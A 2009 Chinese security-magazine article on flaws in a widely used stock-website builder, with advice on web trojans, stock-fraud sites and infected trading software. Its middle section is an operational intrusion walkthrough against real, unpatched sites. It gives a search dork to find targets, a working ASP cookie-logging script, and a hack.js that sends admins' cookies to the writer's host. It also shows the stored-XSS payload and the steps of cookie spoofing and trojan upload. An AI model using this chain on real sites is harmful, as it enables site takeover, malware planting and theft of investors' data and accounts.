80%股票网站危及钱袋

安全阵线

李骏杰 汪泓翰 · 2009年4月27日 第16期

短短几个月,股指从1600多点反弹到目前的2500点左右,股市从“极度冰寒”转变成了“火热朝天”。这段时间很多股民朋友赚钱了、开心了,但股票相关的安全形势却一天天严峻起来。

从2月份以来,大量的股票诈骗网站不断冒出,“黑榜”连续几周都在关注此事,进行了报道,屏蔽了大量股票诈骗网站。如果你觉得自己的安全意识比较好,不会上股票诈骗网站的当,可以安心炒股,这就有危险了!

为什么这么说呢?因为被大量网站使用的易为股票系统出现了严重的漏洞,其中一个漏洞可以用来挂马,浏览网站的股民朋友就有可能中毒。如果中毒了,在进行交易时就有可能导致股票账户里面的现金不翼而飞。

以前的股票网站挂马都不是股票系统出问题,所以影响范围不大,但现在是易为股票系统出问题了,所有使用该系统的网站都可能被挂马,这不令人胆战心惊吗!那么,我们如何在险恶的网络环境中保护股票账户的安全呢?

我们在百度中以“股票网站”为关键字进行搜索,在30个搜索出来的网站中,约有80%的网站使用了易为股票系统,这个比例是相当的高了。目前网上有数百家使用该系统的股票网站。

安全小百科:易为股票系统是一款股票网站的建站程序,使用该系统可以几步就建立一个股票网站。

最近易为股票系统出现了严重的跨站漏洞和SQL注入漏洞,黑客通过SQL注入漏洞可以轻易地获取使用该系统的网站中所有的会员资料,通过跨站漏洞可以获取网站管理员权限,这样就可以在网页上挂马。网站被挂马后,用户只要浏览网站就可能中毒。

虽然一些特大型股票网站没有使用该系统,但数百家使用该系统的股票网站合起来的流量还是非常可观的,拥有大量的用户,可以说很多股民朋友都身陷盗号的危险中。除了股票网站挂马,股票诈骗网站、捆绑了病毒的股票软件都是股民朋友需要注意的陷阱。

易为股票系统出了两个漏洞

作为一款知名的股票网站系统,出现如此严重的安全漏洞实在不应该,并且同时存在跨站漏洞和SQL注入两个大漏洞。

在易为股票系统中,有多处文本框没有进行字符过滤,尤其是其用户注册页面,例如“联系地址”和“银行账号”,我们可以在其中输入<script>alert("测试!")</script> 这样的一句代码,当管理员浏览我们的用户信息时,他的浏览器就会弹出“测试”的对话框。

安全的网站系统是绝对不允许用户提交“</script>”类似的危险代码的,而易为股票系统却丝毫没有对用户提交的危险代码进行限制,因此产生了严重的跨站漏洞。这个漏洞可以被用来挂马。

另一个严重的漏洞是SQL注入漏洞,问题出在网站的分栏浏览页面,同样是因为程序员的疏忽,没有对页面中的变量进行过滤,从而导致了漏洞的发生,黑客可以通过特殊的语句猜解网站数据库中的内容,从而得到重要的资料,例如所有用户的注册信息。

股票网站入侵揭秘

方法1 跨站挂马

挂马流程:通过技术手段获取网站管理员的Cookie值→利用Cookie值进行欺骗进入网站后台→在后台寻找机会上传ASP木马→利用ASP木马修改网站文件→插入挂马代码。

第一步:寻找入侵目标

我们在百度中以“inurl:gp_nl.asp”为关键字进行搜索(图1),可以找到很多符合条件的网站,由于漏洞是最近才被发现的,因此很多网站都还没来得及打上补丁,我们可以随便寻找一个进行测试。

16-f07-1.jpg

我们选择一个目标,它的Google的PR值为5(图2),网站排名系统Alexa中的“三月平均排名”是7万多名(图3),跟一些大型网站比起来小了点,但每天通过这套网站系统浏览网页的股民估计有数十万人次。

16-f07-2.jpg
454dfrererre6.jpg

安全小百科: PR是PageRank的简称,它是谷歌排名运算法则(排名公式)的一部分,用来标示网页的等级和重要性。从1到10共分10个等级,其值越高,说明网站越受欢迎。

第二步:构建获取Cookie值的文件

确定目标后就要获取网站管理员的Cookie值,因此我们需要构建一个获取管理员Cookie值的文件。新建一个文本文件,输入如下内容:

<%

u=request("u")

co=request("co")

set fso=server.CreateObject("Scripting.FileSystemObject")

set txtfso=fso.OpenTextFile(server.mappath("ririri.txt"),8,True)

txtfso.WriteLine("url:"&u)

txtfso.WriteLine("cookie:"&co)

txtfso.WriteLine("time:"&now())

txtfso.WriteLine("---------------")

txtfso.close

response.end

%>

输入完毕后将文件保存为Cookie.asp。将它上传到自己的网站空间里,然后我们再新建一个文本文件,输入:u="http://www.***.com/hack/Cookie.asp?u="+location.href+"&co="+document.cookie+"'";

document.write ("<script src='"+u+"'></script>")

其中www.***.com为网站空间的域名,将这个文件保存为hack.js,将它和Cookie.asp上传到同一目录中。

第三步:插入跨站语句

打开测试网站,在首页中点击“注册会员”按钮,在注册页面中填写基本的信息(图4),我们可以在其中任意一个文本框中插入代码,可见程序的安全性非常的低。跨站的代码为:

16-f07-4.jpg

"><script src="http://www.***.com/hack/j.js"></script>

填写完毕后进行注册即可。接下来我们要做的就是等待,只要管理员在后台查看会员资料,我们就可以拿到管理员的Cookie值。

第四步:Cookie欺骗

当管理员查看会员资料后,我们会在网站空间里的hack目录中找到一个名为hack.txt的文件,打开它,管理员的Cookie信息乖乖地躺在里面呢(图5)。

16-f07-5.jpg

得到管理员的Cookie信息后,我们就可以利用它来进行Cookie欺骗了。拿出强大的黑客工具《啊D注入工具》,我们将会使用到它的Cookie欺骗功能,当然其他具有Cookie欺骗功能的工具也是可以的,例如《桂林老兵Cookie欺骗工具》。

运行《啊D注入工具》,进入到“扫描注入点”功能处,通过其内置的浏览器打开网站,用自己原先注册的账户进行登录。这时我们点击右侧的“Cookie 修改”按钮,将会出现当前账户的Cookie值。我们用获取到的管理员账户Cookie值替换当前的Cookie值,点击“修改”按钮。刷新一下,我们会发现权限已经成为管理员了,并且可以登录后台进行操作。

至此,我们已经拿到了网站的管理员权限,接下来就是通过后台上传ASP木马,并且将配置好的网页木马插入到网站页面中。虽然黑客从入侵到挂马需要进行好几个步骤,但是从插入跨站代码的步骤来看,程序的安全性是非常不够的。相信还有更多的漏洞埋藏在程序中没有被发掘。

方法2 SQL攻击获取注册信息

这种方法相对较简单,因为攻击工具已经在网上可以找到了,不过售价较高。直接运行《易为股票注射漏洞利用工具》,在“网站地址”中填入攻击目标的网址,点击“开始猜解”按钮即可,工具会自动完成猜解(图6)。

16-f07-7.jpg

需要注意的是,因为易为股票系统对用户名和密码进行过二次加密,因此破解管理员账户密码的成功率不高,但是我们却可以通过SQL注入获取整个网站的所有注册会员信息。别小看这些信息,黑客利用它们进行社会工程学攻击,危害也是十分巨大的。

掀翻股票安全头上“三座大山”

看到前面说的股票网站挂马,是不是非常不安?是不是觉得自己的股票账户受到威胁?其实股票网站挂马仅仅是股票安全威胁的一个方面。

当前,股票网站挂马、股票诈骗网站频出、股票软件带毒是压迫广大股民朋友的“三座大山”,如何从“三座大山”的压迫中解放出来呢?不用着急,请看下文。

开山 扫清网页木马

要避免网页木马的黑手,是一个相当复杂的工作。首先,要选择杀毒能力较强的杀毒软件,特别是对中国本土病毒有较高的查杀率。杀毒软件对网页木马的拦截能力是一个很重要的指标,大家也要重点考虑。

目前杀毒软件对网页木马的拦截能力参差不齐,为了保险起见大家还是使用具有网页木马拦截功能的安全辅助工具,安装了这种工具,在访问挂马网页时,会自动屏蔽病毒,防止病毒进入电脑中。

此外,还可以使用账号保护工具,这样即使病毒进入了电脑,但因为你是通过账号保护工具启动网银或者股票交易软件的,会大大降低账号被盗的风险,特别是对键盘记录类盗号病毒防范效果最好。

排山 识破股票诈骗网站

股票诈骗网站有几个很鲜明的特征,只要认清了这些特征,就不会上当受骗。

特征1:宣称能预测股票的涨跌

绝大多数股票诈骗网站都有这个特征,不同的是夸张的程度不同。有的网站号称能通过独家技术,分析出股票的拐点;有的网站则宣称自己有内幕消息,可以提前预知股票的涨跌。一般看到这样的宣传,网站是诈骗网站的可能性非常大。

特征2:注册会员后保证收益

所有的股票诈骗网站都有这个特征,基本上没有例外。收益一般都是非常惊人的,而且时间非常短,可以说注册成为网站的会员就可以一夜暴富。例如,上海东方股票研究所www.755766.cn,这个网站宣称加入会员后可以100%盈利,大肆鼓吹自己成功地预测了哪些股票的涨停板(图7)。

16-f07-8.jpg

特征3:冒充证券公司网站

冒充证券公司网站是当前不法分子最热衷的手段。一般人不会想到证券公司网站有问题,所以此类网站层出不穷。特别是在今年股市开始回温之后,大量的假冒证券公司网站涌现。例如,www.th558.com网站就是假冒的证券公司网站,它宣称可天天提供上涨的黑马,20个交易日内保证获利60%~120%(图8)。大家要看股票资讯最好到国内知名的证券公司网站。

16-f07-9.jpg

特征4:没有进行网络备案

所有的股票诈骗网站也都有这个特征。不法分子根本不敢去进行网络备案,都是采取伪造网络备案号的方式来迷惑用户。所以要识破股票诈骗网站,可以去网络备案系统查询,地址是http://www.miibeian.gov.cn,进去后,点击“公共查询”,再点击“公共信息查询”,在“备案/许可证号”中输入备案号即可进行查询(图9)。

16-f07-10.jpg

移山 清除股票软件中的病毒

股票软件捆绑病毒,并不是什么秘密,特别是一些免费的股票软件很多都带有病毒,这些病毒都是跟股票交易相关的盗号病毒,例如股票大盗。这些病毒传播的方式针对性强、隐蔽性高,不过对付起来也容易。破解版、绿色版,这两种股票软件版本里面大多数都含有盗号病毒,不要轻易使用。此外,最好到知名网站去下载软件,下载后最好用杀毒软件进行一次扫描,确定无毒后再用。